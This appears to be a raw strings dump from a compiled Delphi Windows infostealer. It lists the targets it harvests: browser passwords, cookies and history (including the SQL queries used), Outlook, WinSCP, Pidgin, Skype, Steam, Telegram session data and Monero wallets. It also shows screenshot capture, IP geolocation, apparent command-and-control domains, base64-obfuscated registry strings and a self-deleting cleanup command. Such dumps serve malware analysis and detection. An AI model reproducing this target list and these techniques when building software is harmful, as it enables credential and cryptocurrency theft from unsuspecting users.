This program must be run under Win32
.idata
@.reloc
Cardinal
StringP
WideString
TObject
YZ]_^[
YZ]_^[
_^[YY]
YZ]_^[
C<"u1S
Q<"u8S
~KxI[)
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
YZ]_^[
YZ]_^[
_^[YY]
TSwdPwd
TPwdArray
GlobalVars
GlobalVars
353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F
kernel32.dll
ExpandEnvironmentStringsW
GetComputerNameW
GlobalMemoryStatus
CreateFileW
GetFileSize
CloseHandle
ReadFile
GetFileAttributesW
CreateMutexA
ReleaseMutex
GetLastError
GetCurrentDirectoryW
SetEnvironmentVariableW
GetEnvironmentVariableW
SetCurrentDirectoryW
FindFirstFileW
FindNextFileW
LocalFree
GetTickCount
CopyFileW
FindClose
GlobalMemoryStatusEx
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
GetModuleFileNameW
SetDllDirectoryW
GetLocaleInfoA
GetLocalTime
GetTimeZoneInformation
RemoveDirectoryW
DeleteFileW
GetLogicalDriveStringsA
GetDriveTypeA
CreateProcessW
advapi32.dll
GetUserNameW
RegCreateKeyExW
RegQueryValueExW
RegCloseKey
RegOpenKeyExW
AllocateAndInitializeSid
LookupAccountSidA
CreateProcessAsUserW
CheckTokenMembership
RegOpenKeyW
RegEnumKeyW
RegEnumValueW
CryptAcquireContextA
CryptCreateHash
CryptHashData
CryptGetHashParam
CryptDestroyHash
CryptReleaseContext
user32.dll
EnumDisplayDevicesW
wvsprintfA
GetKeyboardLayoutList
shell32.dll
ShellExecuteExW
ntdll.dll
RtlComputeCrc32
TStringArray
GLOBALFUNC
QQQQQQQSVW
IsWow64Process
kernel32.dll
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
QQQQQQSVW
YZ]_^[
QQQQQSVW
Windows
WTSGetActiveConsoleSessionId
kernel32.dll
WTSQueryUserToken
wtsapi32.dll
CreateEnvironmentBlock
userenv.dll
QQQQQQQSV
|||<[{99C3}]>|||
MTable
MozillaBased
CryptUnprotectData
crypt32.dll
taString
uURLHistory
uIE7_decodeU
uIE7_decodeU
QQQQQQSVW3
[($^|^$)]
InternetExplorer
PVAULT_CRED8
EdgePwds
outlookDecrU
Outlook
QQQQQQ3
QQQQQSVW
WinSCP
PsiPlus
<account>
</account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Pidgin
QQQQQQ3
QQQQQQ
1610149366
SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
Browsers\Cookies
Browsers\History
uFileFinderU
uCoins
uCoins
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs
RGlzcGxheU5hbWU=
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
RGlzcGxheVZlcnNpb24=
GlobalMemoryStatusEx
kernel32.dll
EnumDisplayDevicesW
user32.dll
UHJvY2Vzc29yTmFtZVN0cmluZw==
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==
CPU Count:
GetRAM:
Video Info
uProgAndProc
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90
kernel32.dll
UHJvY2VzczMyRmlyc3RX
UHJvY2VzczMyTmV4dFc=
a2VybmVsMzIuZGxs
MachineID :
EXE_PATH :
Windows :
Computer(Username) :
Screen:
Layouts:
LocalTime:
Zone:
[Soft]
GDIScreenShot
wcscmp
crtdll.dll
GdiplusStartup
Gdiplus.dll
GdiplusShutdown
GdipCreateBitmapFromHBITMAP
GdipGetImageEncodersSize
GdipGetImageEncoders
GdipDisposeImage
GdipSaveImageToStream
CreateStreamOnHGlobal
ole32.dll
GetHGlobalFromStream
QQQQQQS
DnsQuery_A
dnsapi.dll
https://dotbit.me/a/
wsock32.dll
WSAStartup
gethostbyname
socket
connect
closesocket
HTTP/1.0
Host:
Connection: close
User-agent:
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length:
wininet.dll
InternetOpenA
InternetConnectA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
InternetReadFile
InternetCloseHandle
InternetCrackUrlA
InternetSetOptionA
Host:
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
PasswordsList.txt
scr.jpg
Files\
http://ip-api.com/json
"query":"
"countryCode":"
ip.txt
System.txt
Runtime error at 00000000
0123456789ABCDEF
Anm'o-
pinlateofficial.xyz
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
WideCharToMultiByte
MultiByteToWideChar
GetThreadLocale
GetStartupInfoA
GetModuleFileNameA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
ExitProcess
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
GetModuleHandleA
advapi32.dll
RegOpenKeyExA
RegEnumKeyA
FreeSid
kernel32.dll
WriteFile
LocalFree
LoadLibraryExW
LoadLibraryA
GlobalUnlock
GlobalLock
GetTickCount
GetSystemInfo
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetFileAttributesW
GetCurrentProcessId
GetCurrentProcess
FreeLibrary
FindNextFileW
FindFirstFileW
FindClose
ExitProcess
DeleteFileW
CreateDirectoryW
CopyFileW
gdi32.dll
SelectObject
DeleteObject
DeleteDC
CreateCompatibleDC
CreateCompatibleBitmap
BitBlt
user32.dll
ReleaseDC
GetSystemMetrics
CharToOemBuffA
ole32.dll
OleInitialize
CoCreateInstance
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
0(0@0L0\0|0
1"1*121:1B1J1R1Z1b1j1r1z1
9.9:9I9U9]9h9n9{9
:":C:[:z:
:?;_;};
=#=,=3=B=I=k=
=Q>o>t>z>
?J?S?i?
0D0M0]0e0k0t0{0
1(141<1S1b1r1
282V2f2l2t2
3]3d3t3~3
;';>;S;
>.>8>K>{>
>!?(?7?=?J?d?l?
1/161N1p1
1C2V2j2
3 3<3F3k3u3
<#<*<.<4<8<><E<I<c<l<u<
=#=*=4=K=W=d=v=
>&>.>6>>>F>N>V>^>f>n>v>~>
?(?:?@?U?]?e?m?u?}?
4.434<4O4T4]4p4u4~4
455K5S5
6 6$6)656B6G6T6Y6f6k6x6}6
7 7,717>7C7P7U7b7g7t7y7
8(8-8:8?8L8Q8^8c8p8u8
9#90959B9G9T9Y9f9k9x9}9
: :$:/:4:9:D:I:S:X:]:h:m:w:|:
?&?,?B?J?
4&4<4O4e4x4
5J5\5t5
5'6W6\6
7,7z7-8
9-9@9T9]9
;c<o<z<
2#2@2Q2Z2~2
4&5\5|5
6K6o6|6
878R8W8q8v8
<8<e<o<
=*=D=^=x=
0*1F1_1k1r1x1
2*2J2q2
2G3L3T3`3
4I4N4q4v4
565Y5|5
6+6N6q6
7 7)727@7
8"848:8P8t8
9'909;9L9
:(:0:f:{:
;:;h;u;
1"1@1M1X1}1
2&242i2t2
2)343i3t3
575C5P5b5j5o5
6/6<6p6
7!7H7{7
9 989F9d9
9&:9:K:\:
4&4?4K4X4j4p4
5$51565I5V5s5
6c6o6v6
9!:`:t:
:B;X;x;
;7<O<`<
=)=O=[=h=z=
P0U0b0
1*101s1
2E3]3w3
3'434@4R4z4
6*6Q6}6
8,979r9w9|9
:P:U:Z:_:d:i:n:s:x:
>O>[>h>z>
526@6\6
6B7T7a7H8
:#:0:B:w:
`0l0t0
0P1`1p1
4%424?4L4Y4f4s4
9 9N9X9b9
< <,<><K<W<a<k<u<
=.=4=:=B=W=]=c=i=
?#?/?6?@?R?b?
1Q1e1t1
2%2>2W2p2
404P4]4
616A6]6|6
7!7:7S7l7
7,8=8i9
;';7;S;r;
<+<D<]<v<
=<>T>m>|>
?B?J?k?
5$595\5i5v5
858=8y8d9=;
8%9;9a9
:F:a:z:
=2===V=l=
010<0U0`0y0
2-353V3
464;4@4E4
6(6i6w6
4;5G5T5f5
7(7;7N7a7w7
;+;G;`;s;
0"010<0c0
=,=E=S=q=v=
>5>G>X>
?(?:?f?n?
0C1T1g2s2
676E6Z617J7o7
808W8k8
: ;P;};
?*?N?s?
363;3Z3
6d6o6t6
848D8W8g8
<.<F<b<
343D3e3
4-4@4P4c4s4
8.8H8b8
9 9,999F9S9
;*;/;?;D;I;Y;^;c;s;x;};
<)</=;=H=Z=x=
2#2:2Q2h2
3"3E3e3|3
132c2z2
4!4&4<4V4v4
7:8d8t8
94:l:w:
:);4;h;
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6
004080
0H5L5P5T5X5\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6
ProductName
SOFTWARE\Microsoft\Windows NT\CurrentVersion
MachineGuid
SOFTWARE\Microsoft\Cryptography
jjjjjj
jjjjjjj
jjjjjjj
%TEMP%\
%appdata%\
%TEMP%\
%TEMP%
Version
Software\Martin Prikryl\WinSCP 2\Sessions\
HostName
PortNumber
UserName
</jid>
\accounts.xml
%APPDATA%\.purple\accounts.xml
%TEMP%\curbuf.dat
%TEMP%
%TEMP%
%TEMP%
\Cookies
\*.txt
\*.coo
%TEMP%
%TEMP%
%TEMP%
%TEMP%
%TEMP%
\History
\places.sqlite
%APPDATA%\Skype
main.db
\main.db
SteamPath
Software\Valve\Steam
\ssfn*
\Config\*.vdf
\Config\
%APPDATA%\
\autoscan\
\Monero\
.address.txt
Software\
strDataDir
CPU Model:
jjjjjjjj
%TEMP%\
%PROGRAMDATA%\
Telegram
D877F783D5*,map*
%appdata%\Telegram Desktop\tdata\
image/jpeg
%comspec%
/c %WINDIR%\system32\timeout.exe 3 & del "